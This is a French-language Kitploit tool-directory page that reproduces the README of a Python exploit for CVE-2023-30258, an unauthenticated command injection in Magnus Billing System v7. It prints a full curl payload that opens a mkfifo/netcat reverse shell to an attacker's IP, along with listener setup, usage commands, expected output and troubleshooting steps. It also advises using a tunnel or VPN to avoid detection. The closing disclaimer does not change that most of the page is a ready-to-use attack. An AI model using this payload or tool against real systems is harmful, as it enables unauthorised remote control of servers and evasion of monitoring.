Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit — Exploit Python automatisé pour CVE-2023-30258, une injection de commande dans Magnus Billing System v7. Envoie une requête GET modifiée à icepay.php pour exécuter des commandes arbitraires et établir un shell inversé. | Kitploit
Outils/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

Exploit Python automatisé pour CVE-2023-30258, une injection de commande dans Magnus Billing System v7. Envoie une requête GET modifiée à icepay.php pour exécuter des commandes arbitraires et établir un shell inversé.

Voir le dépôt
71il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit du système Magnus Billing v7

Ce script Python automatise l'exploitation d'une vulnérabilité d'injection de commandes dans Magnus Billing System v7, plus précisément dans le script icepay.php situé à /mbilling/lib/icepay/icepay.php. L'exploit utilise le paramètre democ pour exécuter des commandes arbitraires sur le système cible, établissant finalement un reverse shell vers une machine contrôlée par l'attaquant.

Présentation de la vulnérabilité

La vulnérabilité permet une injection de commande sans authentification via une requête GET malveillante. La preuve de concept originale (PoC) utilisait la commande curl suivante :

root@kitploit:~
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

Ce script automatise ce processus en le rendant configurable via des arguments en ligne de commande.

Fonctionnalités

  • Configurable : Spécifiez l'IP cible, l'IP de l'attaquant et le port via des arguments en ligne de commande
  • Simple : Utilise la bibliothèque requests pour envoyer la requête HTTP avec la charge utile
  • Retour : Fournit une sortie claire pour suivre la progression de l'exploit

Prérequis

  • Python 3.x : Assurez-vous que Python 3 est installé sur votre système
  • Bibliothèque Requests : Installez le module Python requests :
    root@kitploit:~
    pip install requests
    
  • Netcat : Le système cible doit avoir netcat (nc) installé pour que le reverse shell fonctionne
  • Listener : Configurez un écouteur netcat sur la machine attaquante pour capturer le reverse shell
  • Cible vulnérable : La cible doit exécuter Magnus Billing System v7 avec le script icepay.php vulnérable accessible

Utilisation

Configuration

  1. Clonez ou téléchargez : Enregistrez le script sous exploit.py
  2. Configurez l'écouteur : Sur votre machine attaquante, démarrez un écouteur netcat :
    root@kitploit:~
    nc -lvnp <PORT>
    
    Remplacez <PORT> par le port de votre choix (ex. 443)

Exécution de l'exploit

root@kitploit:~
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>

Paramètres :

  • -t, --target : Adresse IP du système Magnus Billing cible
  • -a, --attacker : Votre adresse IP pour recevoir le reverse shell
  • -p, --port : Port sur votre machine pour le reverse shell

Exemple

root@kitploit:~
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443

Sortie attendue :

root@kitploit:~
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
  1. Récupérez le shell : Basculez sur votre écouteur netcat pour interagir avec le reverse shell en cas de succès

Notes techniques

  • Type de payload : Le script utilise un reverse shell basé sur FIFO (mkfifo) avec netcat
  • Gestion des erreurs : Des vérifications de base pour les erreurs réseau et les ports invalides sont incluses
  • Débogage : Pour inspecter la réponse du serveur, décommentez print(response.text) dans la fonction exploit()
  • Payloads alternatifs : Le script peut être modifié pour utiliser différents payloads de reverse shell si nécessaire

Dépannage

  • Si la connexion échoue, vérifiez que :
    • Le système cible a netcat installé
    • Aucun pare-feu ne bloque la connexion
    • Les ports corrects sont utilisés
    • La cible n'a pas été corrigée

Considérations de sécurité

  • Envisagez d'utiliser un tunnel SSH ou un VPN lors de l'utilisation de cet exploit pour éviter la détection
  • Le payload pourrait déclencher des systèmes de surveillance de sécurité

Avertissement

Cet outil est fourni à des fins éducatives et de tests de sécurité uniquement. Utilisez-le uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas le consentement de tester est illégale et contraire à l'éthique. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script.

Licence

Ce projet est publié sous la licence MIT. N'hésitez pas à le modifier et à le distribuer selon vos besoins, en conservant l'avertissement intact.

Contribution

Les contributions, les signalements de bugs et les demandes de fonctionnalités sont les bienvenus. N'hésitez pas à soumettre une pull request ou à ouvrir une issue.

Télécharger l’outil